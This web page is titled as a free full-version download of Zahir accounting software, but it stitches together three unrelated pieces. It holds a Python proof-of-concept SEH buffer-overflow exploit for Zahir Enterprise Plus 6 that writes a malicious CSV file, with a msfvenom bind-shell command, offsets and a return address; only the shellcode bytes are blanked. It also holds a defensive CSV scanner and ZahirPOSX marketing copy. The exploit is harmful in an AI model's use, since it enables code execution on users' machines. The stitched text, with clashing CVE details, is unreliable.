Free download zahir accounting software full version

# Exploit Title: Zahir Enterprise Plus 6 build 10b - Buffer Overflow (SEH)
# Google Dork: -
# Date: 2018-09-28
# Exploit Author: modpr0be
# Vendor Homepage: http://www.zahiraccounting.com/
# Software Link: http://zahiraccounting.com/files/zahir-accounting-6-free-trial.zip
# Version: 6 (build 10b) - Download here: http://zahirsoftware.com/zahirupdate/Zahir_SMB_6_Build10b%20-%20MultiUser.zip
# Tested on: Windows 7 x86/64bit
# CVE : N/A
# Category: local & privilege escalation
#
# Description
# The vulnerability occurs when Zahir cannot handle large inputs and anomalies in a crafted CSV file.
# The Zahir main program fails to process the CR LF (Carriage Return Line Feed) characters, which
# causes the Zahir main program to crash.
#
# Credits to f3ci, who found the vulnerability.
#
# Proof of Concept

#!/usr/bin/python
import struct

# msfvenom -p windows/shell_bind_tcp -a x86 -b '\x00\x0a\x0d\x22\x2c'
# -n 20 -e x86/shikata_ga_nai -f python -v sc
# we won't worry about the space, it's big enough!
# badchars are 00,0a,0d,22,2c
sc = ""  # msfvenom output bytes not reproduced here

junk = "A" * 3041
junk += '\n\r'
junk += 'A' * 380
junk += "\xeb\x08\x90\x90"  # nseh
junk += struct.pack('<L', 0x52016661)  # seh pop ecx # pop ebp # ret 0x04 (C:\Program Files\Zahir Personal 6 - Demo Version\vclie100.bpl)
junk += '\x90\x90\x90\x90'
junk += sc
junk += "D" * (5000 - len(junk))

print """
#===============================================================================#
|  Zahir Enterprise Plus 6 <= build 10b Stack Overflow Vulnerability (0day)     |
|  CVE-2018-17408                                                               |
|  by modpr0be & f3ci (research[at]spentera.com)                                |
#===============================================================================#
"""
print "[+] Preparing for file.."
f = open('exploit.csv', 'w')
print "[+] Writing exploit code on a CSV file.."
f.write(junk)
f.close()
print "[+] Success writing file.. bring to Mr. Zahir."
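A pre-import check for the traits the description above names (oversized input and anomalous CR/LF handling in a CSV file), added here as an example; it is not part of the original advisory or the vendor's software. The length thresholds and finding names are assumptions, and the sample inputs are constructed.

```python
MAX_FIELD_LEN = 1024    # assumption: no legitimate field is longer than this
MAX_RECORD_LEN = 4096   # assumption: no legitimate record is longer than this
ALLOWED_CONTROL = {0x09, 0x0A, 0x0D}  # tab, LF, CR


def scan_csv_bytes(data):
    """Return a sorted list of finding names for one CSV file's raw bytes."""
    findings = set()

    # LF directly followed by CR is the reverse of a normal CRLF terminator.
    if b"\n\r" in data:
        findings.add("reversed-line-ending")

    # Bytes that do not decode as UTF-8 text do not belong in a CSV export.
    try:
        data.decode("utf-8")
    except UnicodeDecodeError:
        findings.add("not-valid-utf8")

    # Control characters other than tab/LF/CR (0x7f is DEL).
    if any((b < 0x20 and b not in ALLOWED_CONTROL) or b == 0x7F for b in data):
        findings.add("control-bytes")

    # Normalise terminators, then measure every record and field.
    normalised = data.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
    for record in normalised.split(b"\n"):
        if len(record) > MAX_RECORD_LEN:
            findings.add("oversized-record")
        # Naive comma split: commas inside quotes only make pieces shorter,
        # so a hit here is never caused by quoting.
        if any(len(field) > MAX_FIELD_LEN for field in record.split(b",")):
            findings.add("oversized-field")

    return sorted(findings)


# Constructed samples (not taken from a real file).
BENIGN = b"id,name,amount\r\n1,Kas,1000\r\n2,Bank,250000\r\n"
SUSPICIOUS = b"A" * 3041 + b"\n\r" + b"A" * 380 + b"\x90\x90\xff" + b"D" * 1500

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, scan_csv_bytes(sample))
```

Files that produce any finding can be quarantined for review instead of being opened in the importer.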

ZahirPOSX is a sales automation system (known as a Point of Sales or cashier system) that is here to help you manage your business easily and grow faster.
ZahirPOSX is not just a basic application; we provide a full range of solutions for your business, right in your hand.
Our interactive and user-friendly design lets everyone use it as easily as posting a new status on social media.

Warning

Heavy use of ZahirPOSX boosts the growth of your business faster than you expect!

Features

1. Multiple Outlet
2. Simple transaction flow
3. Multi payment system
4. Save order
5. Send to multiple printer
6. Online and Offline Transaction options
7. Share receipt to social media

Other Benefits
ZahirPOSX is supported by a strong business ecosystem that has been proven for over 22 years.
More than 1500 support teams are ready to help you across 5 countries and over 40 cities around Indonesia.
A strong business community network is available to help and to share its experience sincerely.
More than 40k Zahir certified users from the millennial generation are ready to be part of your team.
All of the above is possible because ZahirPOSX is backed by, and is part of, zahir.co.id, a successful company that has been around for over 22 years and is a market leader in the accounting software industry, and that today has transformed itself into the number 1 application developer for businesses in Indonesia.

Written by Jane